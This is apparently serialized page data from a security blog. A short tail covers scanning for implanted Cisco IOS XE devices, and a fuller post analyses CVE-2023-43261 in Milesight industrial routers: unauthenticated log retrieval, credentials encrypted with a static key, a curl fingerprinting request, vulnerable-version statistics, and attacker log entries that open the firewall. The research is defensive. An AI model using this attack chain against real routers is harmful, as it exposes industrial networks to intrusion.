http:\u002F\u002F192.168.1.1\u002Fwebui\u002Flogoutconfirm.html?logon_hash=1\n1a80b7389ccd0a5dab\n",[886,86002,86003,86019],{"__ignoreMap":219},[1373,86004,86005,86007,86009,86011,86013,86016],{"class":1375,"line":1376},[1373,86006,4644],{"class":2206},[1373,86008,2222],{"class":1391},[1373,86010,76352],{"class":2209},[1373,86012,76355],{"class":1391},[1373,86014,86015],{"class":1391}," http:\u002F\u002F192.168.1.1\u002Fwebui\u002Flogoutconfirm.html?logon_hash=",[1373,86017,86018],{"class":5467},"1\n",[1373,86020,86021],{"class":1375,"line":220},[1373,86022,86023],{"class":2206},"1a80b7389ccd0a5dab\n",[18,86025,86026,86027,86030,86031,86034],{},"Cisco buried the lede by not mentioning ",[1131,86028,86029],{},"thousands"," of internet-facing IOS XE systems have been implanted. ",[295,86032,86033],{},"VulnCheck scanned internet-facing Cisco IOS XE web interfaces and found thousands of implanted hosts",". This is a bad situation, as privileged access on the IOS XE likely allows attackers to monitor network traffic, pivot into protected networks, and perform any number of man-in-the-middle attacks.",[18,86036,86037,86038,86041],{},"VulnCheck has ",[47,86039,25429],{"href":83515,"rel":86040},[51]," the scanner used to find implanted systems on the internet.",[1354,86043,86046],{"className":86044,"code":86045,"language":1359,"meta":219},[1357],"$ .\u002Fimplant-scanner -rhost 192.168.1.1 -rport 80 -a -v -c | grep “implant-id”\ntime=2023-10-17T05:32:29.522-04:00 level=SUCCESS msg=Found implant-id=1a80b7389ccd0a5dab rhost=2192.168.1.1 rport=80 ssl=false\n",[886,86047,86045],{"__ignoreMap":219},[18,86049,86050],{},"If your organization uses an IOS XE system, it's imperative that you determine if your systems have been compromised and take appropriate action once implants have been discovered. While a patch is not yet available, you can protect your organization by disabling the web interface and removing all management interfaces from the internet immediately.",[18,86052,86053,86054,86057,86058,59],{},"For additional guidance, read Cisco PSIRT’s ",[47,86055,5359],{"href":85991,"rel":86056},[51],". Additionally, Cisco Talos wrote an informative blog about discovery of the ",[47,86059,86062],{"href":86060,"rel":86061},"https:\u002F\u002Fblog.talosintelligence.com\u002Factive-exploitation-of-cisco-ios-xe-software\u002F",[51],"issue",[2901,86064,86065],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":86067},[],"VulnCheck scanned the internet for implanted Cisco IOS XE systems and found thousands of results.",{"slug":86070},"cisco-implants","\u002Fblog\u002Fcisco-implants",{"title":83511,"description":86068},"blog\u002Fcisco-implants",[1279],"tjnUA3RF9dmfpw5K7vd-yCaM48jEsH7lGgZzU9zF4I0",{"id":86077,"title":83541,"articles":86078,"authors":86091,"body":86093,"date":87177,"description":87178,"extension":234,"image":7,"link":7,"meta":87179,"navigation":237,"path":87181,"seo":87182,"series":7,"stem":87183,"subtype":7,"tags":87184,"__hash__":87185},"blog\u002Fblog\u002Freal-world-cve-2023-43261.md",[86079,86082,86085,86088],{"title":86080,"source":61436,"link":86081,"date":61828},"Risky Biz News: Israel warns citizens of security camera hack risk","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fsecurity-cameras-forefront-armed-conflict",{"title":86083,"source":14378,"link":86084,"date":61828},"Milesight Industrial Router Vulnerability Possibly Exploited in Attacks","https:\u002F\u002Fwww.securityweek.com\u002Fmilesight-industrial-router-vulnerability-possibly-exploited-in-attacks\u002F",{"title":86086,"source":14382,"link":86087,"date":85796},"Experts Warn of Severe Flaws Affecting Milesight Routers and Titan SFTP Servers","https:\u002F\u002Fthehackernews.com\u002F2023\u002F10\u002Fexperts-warn-of-severe-flaws-affecting.html",{"title":86089,"source":11233,"link":86090,"date":85878},"Milesight routers, Titan SFTP servers impacted by severe bugs","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fmilesight-routers-titan-sftp-servers-impacted-by-severe-bugs",[86092],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":86094,"toc":87174},[86095,86098,86102,86117,86120,86126,86132,86151,86155,86158,86163,86176,86179,86325,86337,86340,86351,86354,86358,86361,86375,86382,86594,86603,86609,86614,86618,86621,86626,86630,86639,86648,86654,86663,86679,86682,86717,86720,86725,86729,86732,86735,86739,86742,86751,86763,86766,86775,87028,87034,87036,87039,87042,87046,87049,87150,87171],[263,86096],{":list":86097,"ico":266,"title":83541},"[\"CVE-2023-43261 has likely been exploited in the wild, but not at scale.\",\"The CVE description does not report the correct set of affected industrial cellular routers nor the correct set of affected firmware.\",\"Although recently disclosed, CVE-2023-43261 was patched years ago.\"]",[1920,86099,86101],{"id":86100},"a-wordy-pre-amble","A Wordy Pre-Amble",[18,86103,86104,86105,86110,86111,86116],{},"The recent disclosure of ",[47,86106,86109],{"href":86107,"rel":86108},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-43261",[51],"CVE-2023-43261"," caught our attention because it reportedly affected a set of well-known industrial cellular routers created by ",[47,86112,86115],{"href":86113,"rel":86114},"https:\u002F\u002Fwww.milesight.com\u002F",[51],"Milesight",". Industrial cellular routers are interesting because they potentially connect an ICS network to the internet. Exploitation might allow an attacker to access the ICS network from the internet. That’s pretty darn interesting.",[18,86118,86119],{},"Why would someone use a cellular router in an ICS network though? Say, for example, you needed to monitor the status of a thousand-mile-long oil pipeline. How do you monitor the portion that cuts through the middle of nowhere? One solution is to use an industrial cellular router.",[18,86121,86122,86123,86125],{},"Of course, now you’ve connected your oil pipeline to the internet, which definitely sounds dangerous. Everything will probably be fine if the router doesn’t expose any services to the internet. Of course, mistakes ",[1131,86124,13888],{}," happen, and that’s how you end up with thousands of Milesight industrial cellular routers exposed to the internet.",[18,86127,86128],{},[68,86129],{":width":10862,"alt":86130,"src":86131},"Milesight on Censys","\u002Fblog\u002Freal-world-cve-2023-43261\u002Fcensys.png",[18,86133,86134,86135,1246,86140,1255,86145,86150],{},"While the oil pipeline scenario is hypothetical, Milesight has documented affected products being used by ",[47,86136,86139],{"href":86137,"rel":86138},"https:\u002F\u002Fwww.milesight-iot.com\u002Fsuccess-stories\u002Fmilesight-facilitates-italy-rail-freight-transport\u002F",[51],"Rail Freight Transport",[47,86141,86144],{"href":86142,"rel":86143},"https:\u002F\u002Fwww.milesight-iot.com\u002Fsuccess-stories\u002Fcellular-connectivity-solution-for-atm-machines\u002F",[51],"ATM networks",[47,86146,86149],{"href":86147,"rel":86148},"https:\u002F\u002Fwww.milesight-iot.com\u002Fsuccess-stories\u002F5g-cellular-router-special-vehicles\u002F",[51],"Emergency Vehicles",". With a good amount of potentially vulnerable hosts, and potentially interesting networks on the other side, you can understand why these routers pique our interest. Let’s look deeper at the vulnerability.",[1920,86152,86154],{"id":86153},"a-glimpse-at-cve-2023-43261","A Glimpse at CVE-2023-43261",[18,86156,86157],{},"The NVD description describes the vulnerability as:",[1925,86159,86160],{},[18,86161,86162],{},"An information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 allows attackers to access sensitive router components.",[18,86164,86165,86166,86171,86172,86175],{},"Honestly, a fairly useless description. No vector? No impact? No auth level? Fortunately, a detailed description was written up by ",[47,86167,86170],{"href":86168,"rel":86169},"https:\u002F\u002Fmedium.com\u002F@win3zz\u002Finside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf",[51],"Bipin Jitiya"," on Medium. A basic summary is the router exposes its ",[886,86173,86174],{},"httpd.log"," (among other things) to remote and unauthenticated attackers via the web interface. Additionally, the router logs a lot of things it shouldn’t: web credentials, vpn credentials, wireless keys, ddns credentials, etc.",[18,86177,86178],{},"Below is an example of credentials being logged during web authentication.",[1354,86180,86182],{"className":22307,"code":86181,"language":22309,"meta":219,"style":219},"2023-10-05 16:25:30 [x.x.x.x:Not Loggined in]:data: {\"id\":\"1\",\"execute\":1,\"core\":\"user\",\"function\":\"login\",\"values\":[{\"username\":\"admin\",\"password\":\"rIuWTTKEjXPXY3oAN7V2kQ==\"}]}\n",[886,86183,86184],{"__ignoreMap":219},[1373,86185,86186,86189,86191,86193,86196,86198,86201,86203,86206,86209,86211,86213,86216,86218,86220,86222,86224,86226,86228,86230,86232,86234,86236,86238,86240,86242,86244,86246,86248,86251,86253,86255,86257,86259,86261,86263,86265,86267,86269,86271,86273,86276,86278,86280,86282,86285,86287,86290,86292,86294,86296,86298,86300,86302,86304,86306,86308,86311,86313,86315,86317,86320,86322],{"class":1375,"line":1376},[1373,86187,86188],{"class":5467},"2023-10-05",[1373,86190,51974],{"class":5467},[1373,86192,4606],{"class":4640},[1373,86194,86195],{"class":5467},"25",[1373,86197,4606],{"class":4640},[1373,86199,86200],{"class":5467},"30",[1373,86202,76315],{"class":1383},[1373,86204,86205],{"class":28571},"x.x.x.x:Not",[1373,86207,86208],{"class":28571}," Loggined",[1373,86210,57301],{"class":28571},[1373,86212,15050],{"class":1383},[1373,86214,86215],{"class":4640},":data: ",[1373,86217,9149],{"class":1383},[1373,86219,183],{"class":9152},[1373,86221,26412],{"class":9155},[1373,86223,183],{"class":9152},[1373,86225,4606],{"class":1383},[1373,86227,183],{"class":9173},[1373,86229,467],{"class":9176},[1373,86231,183],{"class":9173},[1373,86233,5437],{"class":1383},[1373,86235,183],{"class":9152},[1373,86237,51343],{"class":9155},[1373,86239,183],{"class":9152},[1373,86241,4606],{"class":1383},[1373,86243,467],{"class":5467},[1373,86245,5437],{"class":1383},[1373,86247,183],{"class":9152},[1373,86249,86250],{"class":9155},"core",[1373,86252,183],{"class":9152},[1373,86254,4606],{"class":1383},[1373,86256,183],{"class":9173},[1373,86258,39933],{"class":9176},[1373,86260,183],{"class":9173},[1373,86262,5437],{"class":1383},[1373,86264,183],{"class":9152},[1373,86266,8560],{"class":9155},[1373,86268,183],{"class":9152},[1373,86270,4606],{"class":1383},[1373,86272,183],{"class":9173},[1373,86274,86275],{"class":9176},"login",[1373,86277,183],{"class":9173},[1373,86279,5437],{"class":1383},[1373,86281,183],{"class":9152},[1373,86283,86284],{"class":9155},"values",[1373,86286,183],{"class":9152},[1373,86288,86289],{"class":1383},":[{",[1373,86291,183],{"class":9152},[1373,86293,4870],{"class":9165},[1373,86295,183],{"class":9152},[1373,86297,4606],{"class":1383},[1373,86299,183],{"class":9173},[1373,86301,5800],{"class":9176},[1373,86303,183],{"class":9173},[1373,86305,5437],{"class":1383},[1373,86307,183],{"class":9152},[1373,86309,86310],{"class":9165},"password",[1373,86312,183],{"class":9152},[1373,86314,4606],{"class":1383},[1373,86316,183],{"class":9173},[1373,86318,86319],{"class":9176},"rIuWTTKEjXPXY3oAN7V2kQ==",[1373,86321,183],{"class":9173},[1373,86323,86324],{"class":1383},"}]}\n",[18,86326,86327,86328,86333,86334,86336],{},"As you can see, both the username and password are present. The password appears encrypted, and it is. But it’s encrypted with a static key and IV, so it’s trivial to ",[47,86329,86332],{"href":86330,"rel":86331},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F645b345f1d81",[51],"decrypt",". All an attacker needs to do is fetch the ",[886,86335,86174],{},", decrypt the last successful login, and then they have full access to the web interface too. The web interface allows the user to configure vpn servers and drop firewall protections (among other things), so once you have credentials, it’s fairly easy to access the ICS (or industrial-adjacent) network from the internet.",[18,86338,86339],{},"Given the ease of exploitation and large number of potential victims (for ICS), we had a few questions that we felt needed to be answered:",[1789,86341,86342,86345,86348],{},[25,86343,86344],{},"The CVE description provides an affected firmware version that only applies to one of the listed models. V35.3.0.7, the listed firmware, is only used by the model UR35, but the CVE description lists a number of other affected models (UR5X, UR32L, UR32, UR35, UR41).",[25,86346,86347],{},"How many of the systems we saw on Censys are actually vulnerable?",[25,86349,86350],{},"Is CVE-2023-43261 being actively exploited?",[18,86352,86353],{},"In the remainder of this blog, we’ll explore these three questions.",[61,86355,86357],{"id":86356},"who-is-vulnerable","Who Is Vulnerable?",[18,86359,86360],{},"Acquiring old firmware from Milesight appears to be a no-go, so we were forced to do this the good old-fashioned way:",[1789,86362,86363,86366,86369],{},[25,86364,86365],{},"Get a list of internet-facing systems.",[25,86367,86368],{},"Find a way to get their model and version without authentication.",[25,86370,86371,86372,86374],{},"Attempt to download the ",[886,86373,86174],{}," file.",[18,86376,86377,86378,86381],{},"The first two steps were easy (Shodan, Censys, FOFA, whatever you please). The second step turned out to be quite easy as well. The router responds to an unauthenticated HTTP request to ",[886,86379,86380],{},"\u002Fislogin"," with a detailed description of the model and version.",[1354,86383,86385],{"className":22307,"code":86384,"language":22309,"meta":219,"style":219},"curl -ks https:\u002F\u002F192.168.1.1\u002Flogin | jq\n{\n \"id\": -1,\n \"model\": \"UR35\",\n \"pn\": \"\",\n \"oem\": \"0000\",\n \"rtver\": \"35.2.0.10\",\n \"status\": -2,\n \"result\": [\n {\n \"login\": \"false\",\n \"ysrole\": 0,\n \"timeout\": 0,\n \"upgrade_error\": 0\n }\n ]\n}\n",[886,86386,86387,86395,86399,86414,86434,86449,86469,86489,86504,86516,86520,86538,86553,86568,86582,86586,86590],{"__ignoreMap":219},[1373,86388,86389,86392],{"class":1375,"line":1376},[1373,86390,86391],{"class":4640},"curl -ks https:",[1373,86393,86394],{"class":4630},"\u002F\u002F192.168.1.1\u002Flogin | jq\n",[1373,86396,86397],{"class":1375,"line":220},[1373,86398,8904],{"class":1383},[1373,86400,86401,86403,86405,86407,86409,86412],{"class":1375,"line":1266},[1373,86402,23732],{"class":9152},[1373,86404,26412],{"class":9155},[1373,86406,183],{"class":9152},[1373,86408,4606],{"class":1383},[1373,86410,86411],{"class":5467}," -1",[1373,86413,9062],{"class":1383},[1373,86415,86416,86418,86421,86423,86425,86427,86430,86432],{"class":1375,"line":1852},[1373,86417,23732],{"class":9152},[1373,86419,86420],{"class":9155},"model",[1373,86422,183],{"class":9152},[1373,86424,4606],{"class":1383},[1373,86426,4883],{"class":9173},[1373,86428,86429],{"class":9176},"UR35",[1373,86431,183],{"class":9173},[1373,86433,9062],{"class":1383},[1373,86435,86436,86438,86441,86443,86445,86447],{"class":1375,"line":4692},[1373,86437,23732],{"class":9152},[1373,86439,86440],{"class":9155},"pn",[1373,86442,183],{"class":9152},[1373,86444,4606],{"class":1383},[1373,86446,16579],{"class":9173},[1373,86448,9062],{"class":1383},[1373,86450,86451,86453,86456,86458,86460,86462,86465,86467],{"class":1375,"line":4724},[1373,86452,23732],{"class":9152},[1373,86454,86455],{"class":9155},"oem",[1373,86457,183],{"class":9152},[1373,86459,4606],{"class":1383},[1373,86461,4883],{"class":9173},[1373,86463,86464],{"class":9176},"0000",[1373,86466,183],{"class":9173},[1373,86468,9062],{"class":1383},[1373,86470,86471,86473,86476,86478,86480,86482,86485,86487],{"class":1375,"line":4756},[1373,86472,23732],{"class":9152},[1373,86474,86475],{"class":9155},"rtver",[1373,86477,183],{"class":9152},[1373,86479,4606],{"class":1383},[1373,86481,4883],{"class":9173},[1373,86483,86484],{"class":9176},"35.2.0.10",[1373,86486,183],{"class":9173},[1373,86488,9062],{"class":1383},[1373,86490,86491,86493,86495,86497,86499,86502],{"class":1375,"line":4768},[1373,86492,23732],{"class":9152},[1373,86494,9216],{"class":9155},[1373,86496,183],{"class":9152},[1373,86498,4606],{"class":1383},[1373,86500,86501],{"class":5467}," -2",[1373,86503,9062],{"class":1383},[1373,86505,86506,86508,86510,86512,86514],{"class":1375,"line":4792},[1373,86507,23732],{"class":9152},[1373,86509,17636],{"class":9155},[1373,86511,183],{"class":9152},[1373,86513,4606],{"class":1383},[1373,86515,26352],{"class":1383},[1373,86517,86518],{"class":1375,"line":4798},[1373,86519,4765],{"class":1383},[1373,86521,86522,86524,86526,86528,86530,86532,86534,86536],{"class":1375,"line":4806},[1373,86523,39881],{"class":9152},[1373,86525,86275],{"class":9165},[1373,86527,183],{"class":9152},[1373,86529,4606],{"class":1383},[1373,86531,4883],{"class":9173},[1373,86533,5971],{"class":9176},[1373,86535,183],{"class":9173},[1373,86537,9062],{"class":1383},[1373,86539,86540,86542,86545,86547,86549,86551],{"class":1375,"line":4817},[1373,86541,39881],{"class":9152},[1373,86543,86544],{"class":9165},"ysrole",[1373,86546,183],{"class":9152},[1373,86548,4606],{"class":1383},[1373,86550,5557],{"class":5467},[1373,86552,9062],{"class":1383},[1373,86554,86555,86557,86560,86562,86564,86566],{"class":1375,"line":4825},[1373,86556,39881],{"class":9152},[1373,86558,86559],{"class":9165},"timeout",[1373,86561,183],{"class":9152},[1373,86563,4606],{"class":1383},[1373,86565,5557],{"class":5467},[1373,86567,9062],{"class":1383},[1373,86569,86570,86572,86575,86577,86579],{"class":1375,"line":4835},[1373,86571,39881],{"class":9152},[1373,86573,86574],{"class":9165},"upgrade_error",[1373,86576,183],{"class":9152},[1373,86578,4606],{"class":1383},[1373,86580,86581],{"class":5467}," 0\n",[1373,86583,86584],{"class":1375,"line":4843},[1373,86585,35334],{"class":1383},[1373,86587,86588],{"class":1375,"line":4849},[1373,86589,29369],{"class":1383},[1373,86591,86592],{"class":1375,"line":4877},[1373,86593,1855],{"class":1383},[18,86595,86596,86597,86602],{},"Above, you can see the response is from a UR35 running firmware version 35.2.0.10. Obviously, very useful data if you are interested in potentially exploiting these things. This is the type of fingerprinting I’d expect to see on ",[47,86598,86601],{"href":86599,"rel":86600},"https:\u002F\u002Fviz.greynoise.io\u002Fquery?gnql=%22%2Fislogin%22",[51],"Greynoise",", but there is no indication that anyone is doing so at this time.",[18,86604,86605,86606,86608],{},"Using ",[886,86607,86380],{}," and our list of internet-facing systems, we were able to compile two useful lists: the most prevalent models in the wild and the most prevalent firmware versions. The following pie chart shows that the vast majority of routers are UR32\u002FUR32L\u002FUR35. There are actually 23 different slices, but the other models are far fewer (additional slices include more UR series, UG series, NA series, and something simply called “Unknown”).",[1925,86610,86611],{},[18,86612,86613],{},"Milesight Industrial Cellular Router Models in the Wild",[78559,86615],{":labels":86616,":values":86617},"[\"UR32L\",\"UR32\",\"UR35\",\"UG65\",\"UG67\",\"UG87\",\"UR75\",\"UR51\",\"UR32S\",\"NA32L\",\"NA32\",\"UG56\",\"UR55\",\"NA35\",\"UG85\",\"UR76\",\"UR52\",\"Unknown\",\"UR41\",\"UG63\",\"UR72\",\"UF51\",\"NA41\"]","[832,781,294,126,36,29,20,19,16,10,9,7,6,6,4,3,3,3,2,2,1,1,1]",[18,86619,86620],{},"In the next pie chart, you can see the firmware listed in the CVE description (35.3.0.7) doesn’t have a large enough slice to be listed. Half of the pie is actually made up of firmware, starting with 32. If you take the CVE description at face value, those should be vulnerable, right? (this is foreshadowing)",[1925,86622,86623],{},[18,86624,86625],{},"Milesight Industrial Cellular Router Firmware Versions in the Wild",[78559,86627],{":labels":86628,":values":86629},"[\"32.3.0.7\",\"32.3.0.5\",\"32.3.0.4\",\"32.3.0.1\",\"32.3.0.3\",\"32.3.0.6\",\"32.2.0.33\",\"32.3.4801.5\",\"61.1.0.9\",\"32.3.0.2\",\"32.3.10.6\",\"32.2.0.39\",\"35.2.0.36\",\"32.2.0.20\",\"35.3.0.2\",\"32.3.10.5\",\"35.3.0.5\",\"35.3.0.3\",\"35.3.0.4\",\"32.2.0.36\",\"35.2.0.38\",\"61.0.0.37\",\"32.2.0.28\",\"61.1.0.8\",\"60.0.0.42\",\"51.3.0.41\",\"35.2.0.20\",\"34.3.0.4\",\"80.0.0.83\",\"61.1.0.7\",\"35.3.0.7\",\"35.3.0.6\",\"35.3.10.6\",\"35.1.0.61\",\"32.1.0.61\",\"32.2.0.32\",\"35.2.0.32\",\"1.2.0.64\",\"61.0.0.36\",\"60.0.0.37\",\"56.0.0.3\",\"35.3.4801.5\",\"35.3.0.1\",\"35.1.0.58\",\"32.1.0.32\",\"80.0.0.85\",\"80.0.0.66\",\"32.2.0.35\",\"32.2.0.18\",\"60.0.0.38\",\"35.2.0.33\",\"32.2.0.29\",\"60.0.0.41\",\"60.0.0.40\",\"60.0.0.36\",\"35.1.0.35\",\"32.2.0.10\",\"76.1.0.21\",\"55.3.0.41\",\"52.3.0.41\",\"41.0.0.2\",\"1.2.0.79\",\"80.0.0.82\",\"80.0.0.75\",\"80.0.0.53\",\"76.2.0.8\",\"76.2.0.6\",\"63.0.0.1\",\"61.1.0.2\",\"35.2.0.18\",\"35.2.0.10\",\"35.1.0.32\",\"32.3.0654.2\",\"32.2.0.22\",\"32.1.0.41\",\"1.2.0.46\",\"76.2.0.7\",\"60.0.0.39\",\"55.2.0.45\",\"55.2.0.42\",\"55.1.0.69\",\"35.2.0.21\",\"32.2.0.6\",\"32.2.0.27\",\"32.1.61.18\",\"32.1.0.48\",\"32.1.0.17\",\"2.2.0.81\",\"1.2.0.86\",\"1.2.0.38\",\"1.1.0.69\"]","[657,166,155,82,71,66,61,60,50,50,47,46,37,35,34,32,30,30,29,27,26,23,21,20,20,19,18,16,15,15,14,13,12,12,11,9,8,8,7,7,7,7,7,7,7,6,6,6,6,5,5,5,4,4,4,4,4,3,3,3,3,3,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]",[18,86631,86632,86633,86635,86636,86638],{},"Armed with many potential vulnerable targets, we set out to establish if this was being exploited in the wild. In order to do that, we needed to grab the ",[886,86634,86174],{}," to determine if attackers were logging into systems on their first try. However, this is where we ran into trouble. The ",[886,86637,86174],{}," was rarely available.",[18,86640,86641,86642,86647],{},"The NVD entry for CVE-2023-43261 reports 35.3.0.7 as the fixed version (published in ",[47,86643,86646],{"href":86644,"rel":86645},"https:\u002F\u002Fwww.milesight.com\u002Fiot\u002Fresources\u002Fdownload\u002Frelease-note\u002F?type=ur3x",[51],"July 2023","). If you take that at face value, the vast majority of routers in the pie chart above should be vulnerable (because 32.x is by far the most popular version). The reality, however, is that the major value (e.g., 35 or 32) describes the model the firmware is for. 35.3.0.7 is only for UR35. So, 35.3.0.7 can’t be the fixed version for UR32L\u002FUR32. But, since 32.3.0.7 was released at the exact same time as 35.3.0.7, we can assume that the CVE description is wrong and that it should have listed a patched version for each model.",[18,86649,86650,86651,86653],{},"Assuming 32.3.0.7 is the patch version for UR32L\u002FUR32, we can see a good chunk of routers ",[1131,86652,1133],{}," using a patched version. In fact, 32.3.0.7 is the largest slice of the pie above.",[18,86655,86656,86657,86659,86660,86662],{},"But that large chunk wasn’t enough to account for all the failures we were seeing. We weren’t just failing to fetch ",[886,86658,86174],{}," from 35.3.0.7. We also failed on 35.3.0.6 and 35.3.0.5 and 35.3.0.4 and any other version all the way down to 35.2.0.10 (aka 32.2.0.10). This implies the first patch went into 35.2.0.18 and ",[1131,86661,6881],{}," 35.3.0.7.",[18,86664,86665,86666,86671,86672,86675,86676,86678],{},"Milesight historically did a bad job of dating releases, but thanks to the ",[47,86667,86670],{"href":86668,"rel":86669},"https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20210305101210\u002Fhttps:\u002F\u002Fwww.milesight-iot.com\u002Ffirmware-release-note\u002F",[51],"Wayback Machine,"," we know that in March 2021 was the most recent release of UR35 was 35.2.0.32, a version we determined that we ",[1131,86673,86674],{},"could not"," get the ",[886,86677,86174],{}," from. That means CVE-2023-43261 has been patched for years!",[18,86680,86681],{},"So not only does the CVE provide insufficient affected versions, but the one it does provide is wrong. Based on the data we collected, we believe the affected models and their last vulnerable version are something like this (note that some of these are forever days, but they are also older models, so it’s unlikely to be seen in large numbers):",[22,86683,86684,86687,86690,86693,86696,86699,86702,86705,86708,86711,86714],{},[25,86685,86686],{},"UR32: 32.2.0.10",[25,86688,86689],{},"UR32L: Not affected versions",[25,86691,86692],{},"UR35: 35.2.0.10",[25,86694,86695],{},"UR41: Not affected versions",[25,86697,86698],{},"UR51: 51.3.0.41 (Final release \u002F Discontinued)",[25,86700,86701],{},"UR52: 52.3.0.41 (Final release \u002F Discontinued)",[25,86703,86704],{},"UR55: 55.3.0.41 (Final release \u002F Discontinued)",[25,86706,86707],{},"UR72: 72.2.0.81 (Final release \u002F Discontinued)",[25,86709,86710],{},"UR75: 75.2.0.81 (Final release \u002F Discontinued)",[25,86712,86713],{},"UR75 5g: No affected versions",[25,86715,86716],{},"UR76: No affected versions",[18,86718,86719],{},"Now that we know the actual affected versions, we can revisit all the firmware versions we collected to determine how many vulnerable systems exist in the wild. The following pie graph spells things out clearly:",[1925,86721,86722],{},[18,86723,86724],{},"Vulnerable Milesight Industrial Cellular Routers in the Wild",[78559,86726],{":labels":86727,":values":86728},"[\"Not Vulnerable\",\"Vulnerable\"]","[93.5,6.5]",[18,86730,86731],{},"Only ~5% of the internet-facing routers are vulnerable. That's a huge drop from what the CVE description led us to believe. But it’s not all bad. To paraphrase a recently popular tweet, “You won’t catch me crying that I only have a couple of hundred industrial networks to breach.”",[18,86733,86734],{},"Which leads us to the question, is this being exploited in the wild?",[1920,86736,86738],{"id":86737},"probably-exploited-in-the-wild","Probably Exploited in the Wild?",[18,86740,86741],{},"The answer is “probably.” It’s difficult to precisely say just from the logs. We lack some amount of context. We did not observe obvious mass exploitation. However, there is evidence of small-scale exploitation. Consider the following example.",[18,86743,86744,86745,86750],{},"We observed ",[47,86746,86749],{"href":86747,"rel":86748},"https:\u002F\u002Fwww.shodan.io\u002Fhost\u002F5.61.39.232",[51],"5.61.39.232"," attempting to log into six systems on October 2, 2023. The affected systems’ IP addresses geolocate to France, Lithuania, and Norway. They don’t appear to be related, and all use different non-default credentials.",[18,86752,86753,86754,86756,86757,86759,86760,86762],{},"On four systems, the attacker successfully authenticated on the first attempt. One time, the attacker attempted two different passwords. Both passwords (failed and successful) were already present in the ",[886,86755,86174],{},". Finally, on the last system, they could not authenticate. The ",[886,86758,86174],{}," had many login attempts but no successful logins. The attacker attempted all the unique credentials that were already in ",[886,86761,86174],{}," and then made no more attempts. That pattern could reasonably be CVE-2023-43261.",[18,86764,86765],{},"What did the attacker do once they logged in? In each case, for this particular attacker, they made no changes. They appeared to rifle through all the settings\u002Fstatus pages (sms inbox, openvpn server, users, ddns config, etc.) and log out. Perhaps recon? Perhaps just someone who is curious? Unclear. Some of the victims did have configured vpn servers, and the attacker did expose the cleartext credentials, which is enough for the attacker to pivot into the ICS network.",[18,86767,86768,86769,86774],{},"There are other examples of potential attacks, but as stated, they are not widespread. Not all attackers are hands-off. There are examples of potential attackers configuring the vpn and even opening up the firewall (this is ",[47,86770,86773],{"href":86771,"rel":86772},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F200.73.18.40",[51],"200.73.18.40"," going after a system in Canada):",[1354,86776,86778],{"className":22307,"code":86777,"language":22309,"meta":219,"style":219},"2023-10-04 20:11:24 [200.73.18.40:admin]:data: {\"id\":51,\"execute\":1,\"core\":\"yruo_firewall_security\",\"function\":\"set\",\"values\":[{\"base\":\"yruo_firewall_security\",\"index\":1,\"value\":{\"http_remote\":1,\"https_remote\":1,\"telnet_remote\":1,\"ssh_remote\":1,\"ftp_local\":1,\"ftp_remote\":1,\"url\":[\"http:\u002F\u002F\"],\"keyword\":[\"\"]}}]}\n",[886,86779,86780],{"__ignoreMap":219},[1373,86781,86782,86785,86787,86789,86791,86793,86795,86797,86800,86802,86805,86808,86810,86812,86814,86816,86818,86820,86822,86824,86826,86828,86830,86832,86834,86836,86838,86840,86842,86844,86846,86848,86851,86853,86855,86857,86859,86861,86863,86865,86868,86870,86872,86874,86876,86878,86880,86882,86885,86887,86889,86891,86893,86895,86897,86899,86902,86904,86906,86908,86910,86912,86914,86916,86918,86920,86924,86926,86928,86930,86932,86934,86937,86939,86941,86943,86945,86947,86950,86952,86954,86956,86958,86960,86963,86965,86967,86969,86971,86973,86976,86978,86980,86982,86984,86986,86989,86991,86993,86995,86997,86999,87001,87003,87005,87007,87010,87012,87014,87016,87019,87021,87023,87025],{"class":1375,"